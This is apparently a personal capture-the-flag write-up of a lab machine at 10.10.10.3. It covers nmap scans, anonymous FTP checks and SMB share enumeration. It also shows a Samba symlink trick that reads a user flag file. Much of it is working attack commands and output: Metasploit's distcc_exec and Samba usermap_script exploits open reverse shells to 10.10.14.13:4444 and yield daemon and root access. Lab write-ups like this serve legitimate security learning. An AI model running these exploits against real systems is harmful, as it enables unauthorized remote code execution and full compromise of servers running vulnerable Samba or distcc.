# Nmap 7.70 scan initiated Tue Jul 2 21:55:24 2019 as: nmap -oN T-common 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.23s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
# Nmap done at Tue Jul 2 21:55:38 2019 -- 1 IP address (1 host up) scanned in 13.34 seconds
100% TCP port scan
sudo nmap -p- -T4 -oN T-all 10.10.10.3
# Nmap 7.70 scan initiated Tue Jul 2 21:55:36 2019 as: nmap -p- -T4 -oN T-all 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.24s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
# Nmap done at Tue Jul 2 21:59:27 2019 -- 1 IP address (1 host up) scanned in 230.72 seconds
# Nmap 7.70 scan initiated Tue Jul 2 22:00:25 2019 as: nmap -sV -sC -p 21,22,139,445,3632 -oN O-Detailed 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 4h06m55s, deviation: 0s, median: 4h06m55s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-02T12:37:33-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 2 22:01:18 2019 -- 1 IP address (1 host up) scanned in 52.99 seconds
Probable attack vectors
Service
Reason
FTP - 21
Anonymous login enabled
SMB - 445
Samba shares enumeration and old version of samba
DistCCD - 3632
An odd service running version 1
FTP file enumeration got me nothing.
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:jtnydv): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp>
However the FTP Server vsFTPd 2.3.4 is vulnerable to remote code execution (MSF) as per my initial searchsploit search.
However, running this exploit using Metasploit and trying to exploit the vulnerability manually didn't get me a shell.
User Own
There are 2 ways to own the user in this box, as per my understanding.
Using SMB
I have read and write access in one of the SMB Shares.
smbmap -H 10.10.10.3 -u ""
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions
---- -----------
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESS
makis as a user stuck out to me hence I tried making a symlink to the /home/makis/user.txt file and own user.
smb: \> symlink /home/makis/user.txt user
smb: \> ls
. D 0 Wed Jul 3 10:14:05 2019
.. DR 0 Mon May 21 00:06:12 2012
.ICE-unix DH 0 Wed Jul 3 10:01:57 2019
pass R 1549 Wed Mar 15 03:46:58 2017
user R 33 Wed Mar 15 01:57:44 2017
.X11-unix DH 0 Wed Jul 3 10:02:34 2019
5170.jsvc_up R 0 Wed Jul 3 10:03:10 2019
.X0-lock HR 11 Wed Jul 3 10:02:34 2019
7282168 blocks of size 1024. 5678804 blocks available
smb: \> get user
getting file \user of size 33 as user (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
As evident from the list of files, we have our user flag 69454***
Using DistCC service
A simple searchsploit search for DistCC got me a metasploit RCE exploit entry DistCC Daemon - Command Execution (Metasploit)
msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 10.10.14.13:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo pbbLnvIuNegIZaqi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.3:55417) at 2019-07-03 10:12:30 +0530
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
cat /home/makis/user.txt
69454***
Using this method also we can get the user flag from the system, however this is not privileged and can not be leveraged to get root, however, this is a good and stable shell for further enumeration.
Root Own
Owning root is a simple process in this box. Run an existing exploit Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) on the old samba service to get the root shell.
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.13:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NohFWWf4R8eYZZsR;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NohFWWf4R8eYZZsR\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.3:41230) at 2019-07-03 10:16:23 +0530
id
uid=0(root) gid=0(root)
cat /root/root.txt
92caa***
Takeaway
My personal takeaway from this box was to enumerate all the running services and the their versions first before running into the manual enumeration. While solving this box I completely forgot about running samba service and wasted quite a while enumerating to privilege escalate my way to root using the daemon shell.